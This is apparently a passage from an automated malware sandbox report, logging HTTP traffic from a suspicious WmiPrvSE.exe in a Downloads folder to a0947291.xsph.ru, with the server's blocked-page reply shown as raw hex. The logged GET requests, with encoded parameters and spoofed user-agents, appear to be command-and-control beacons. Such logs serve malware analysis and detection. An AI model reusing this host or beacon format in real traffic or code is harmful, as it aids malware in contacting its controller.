63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d
                                                Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.449746141.8.194.74804076C:\Users\Default\Downloads\WmiPrvSE.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 25, 2024 10:20:15.066021919 CEST422OUTGET /1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&n8ux2yA6XyMoklAzV5ek7V=UqOdN8 HTTP/1.1
                                                Accept: */*
                                                Content-Type: text/html
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                Host: a0947291.xsph.ru
                                                Connection: Keep-Alive
                                                Apr 25, 2024 10:20:15.326227903 CEST1289INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:20:15 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d
                                                Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}
                                                Apr 25, 2024 10:20:15.326374054 CEST1289INData Raw: 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 68 65 69 67 68 74 3a 34 35 30 70 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69
                                                Data Ascii: .wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:
                                                Apr 25, 2024 10:20:15.326416016 CEST1289INData Raw: 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 69 67 68 74 2d 73 69 64 65 20 2e 69 6d 61 67 65 2d 63 6f 6e
                                                Data Ascii: e{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;heigh
                                                Apr 25, 2024 10:20:15.326456070 CEST1289INData Raw: 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67 68 74 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65
                                                Data Ascii: ace:pre-line}.wrapper .content .footer__rights{font-size:10px;font-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77
                                                Apr 25, 2024 10:20:15.326493979 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 33 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p>
                                                Apr 25, 2024 10:20:15.326531887 CEST1289INData Raw: 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34 20 31 39 38 2e 30 31 34 20 36 35 2e 32 34 35 34 43 31 39 38 2e 35 38 37 20 36 33 2e 39 30 38 37 20 31 39 36 2e 36 37 35 20 36 33 2e 35 32 36 38 20 31 39 36 2e 32 39 32 20 36 34 2e 36 37 32 35 5a 22
                                                Data Ascii: 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.9985C167.602 98.2799 168.559 96.3704 169.515 94.8428C169.898 94.27 1
                                                Apr 25, 2024 10:20:15.326570034 CEST1289INData Raw: 32 2e 31 36 34 20 39 36 2e 31 37 38 34 20 31 34 31 2e 32 30 38 20 39 37 2e 31 33 33 31 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 33 39 2e 31 30 34 20 39 32 2e 33 36 30 35 4c 31
                                                Data Ascii: 2.164 96.1784 141.208 97.1331Z" fill="black"/> <path d="M139.104 92.3605L128.393 95.6066C127.245 95.9885 127.628 97.7071 128.967 97.5161C132.601 96.3704 136.235 95.4157 139.678 94.27C140.634 93.8881 140.251 92.1695 139.104 92.3605Z" fi
                                                Apr 25, 2024 10:20:15.326611042 CEST1289INData Raw: 30 32 20 39 39 2e 39 39 39 31 20 32 39 34 2e 30 32 39 20 39 39 2e 39 39 39 31 20 32 39 33 2e 34 35 35 20 31 30 30 2e 33 38 31 43 32 39 30 2e 33 39 35 20 31 30 33 2e 34 33 36 20 32 38 37 2e 31 34 33 20 31 30 36 2e 34 39 31 20 32 38 34 2e 30 38 33
                                                Data Ascii: 02 99.9991 294.029 99.9991 293.455 100.381C290.395 103.436 287.143 106.491 284.083 109.547C283.892 109.738 260.749 128.26 251.568 139.717C247.36 137.043 243.152 134.561 238.944 131.888C239.136 130.36 239.136 128.833 238.37 127.496C236.267 123.
                                                Apr 25, 2024 10:20:15.326649904 CEST1289INData Raw: 36 39 2e 31 30 30 39 20 36 37 2e 33 34 36 36 20 37 35 2e 30 33 30 31 20 37 33 2e 32 36 36 31 43 38 30 2e 31 39 34 33 20 37 38 2e 34 32 31 37 20 38 35 2e 35 34 39 37 20 38 33 2e 31 39 35 35 20 39 31 2e 36 37 30 32 20 38 37 2e 32 30 35 35 43 39 34
                                                Data Ascii: 69.1009 67.3466 75.0301 73.2661C80.1943 78.4217 85.5497 83.1955 91.6702 87.2055C94.7304 89.115 97.9819 90.8335 101.425 92.1702C103.146 102.481 105.059 112.984 109.649 122.34C109.649 122.34 109.649 122.34 109.458 122.34C100.468 125.586 92.0527
                                                Apr 25, 2024 10:20:15.326688051 CEST1289INData Raw: 35 37 33 38 20 31 32 38 2e 30 36 39 20 31 30 2e 39 35 36 33 20 31 32 38 2e 38 33 33 43 31 31 2e 33 33 38 38 20 31 32 39 2e 34 30 35 20 31 32 2e 31 30 33 39 20 31 32 39 2e 37 38 37 20 31 32 2e 36 37 37 37 20 31 33 30 2e 31 36 39 43 31 33 2e 30 36
                                                Data Ascii: 5738 128.069 10.9563 128.833C11.3388 129.405 12.1039 129.787 12.6777 130.169C13.0602 130.551 13.634 130.742 14.0165 130.933C12.1039 131.506 10.3825 132.843 9.61744 134.752C9.42617 135.134 9.8087 135.516 9.99997 135.898C13.4427 138.38 17.4593 1
                                                Apr 25, 2024 10:20:15.584947109 CEST1289INData Raw: 32 36 2e 38 34 38 20 36 37 2e 35 37 30 38 20 33 32 38 2e 31 38 35 43 37 32 2e 39 32 36 32 20 33 32 39 2e 39 30 33 20 37 39 2e 30 34 36 37 20 33 32 39 2e 31 33 39 20 38 34 2e 34 30 32 31 20 33 32 37 2e 38 30 33 43 38 39 2e 35 36 36 32 20 33 32 36
                                                Data Ascii: 26.848 67.5708 328.185C72.9262 329.903 79.0467 329.139 84.4021 327.803C89.5662 326.466 94.5391 324.748 99.1295 322.265C108.501 317.682 116.726 311.19 123.42 303.17C123.42 308.708 123.42 314.054 123.803 319.592C123.42 319.401 123.229 319.401 12
                                                Apr 25, 2024 10:20:15.846633911 CEST398OUTGET /1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&n8ux2yA6XyMoklAzV5ek7V=UqOdN8 HTTP/1.1
                                                Accept: */*
                                                Content-Type: text/html
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                Host: a0947291.xsph.ru
                                                Apr 25, 2024 10:20:16.105532885 CEST1289INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:20:15 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d
                                                Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5192.168.2.449747141.8.194.7480
                                                TimestampBytes transferredDirectionData
                                                Apr 25, 2024 10:20:46.362122059 CEST516OUTGET /1606aca9.php?LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&LB0fbF4jPSXn2GcGAitDf41seHeqJO=wQJizLUNdVtoEeR HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/json
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                Host: a0947291.xsph.ru
                                                Connection: Keep-Alive
                                                Apr 25, 2024 10:20:46.602665901 CEST1289INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:20:46 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 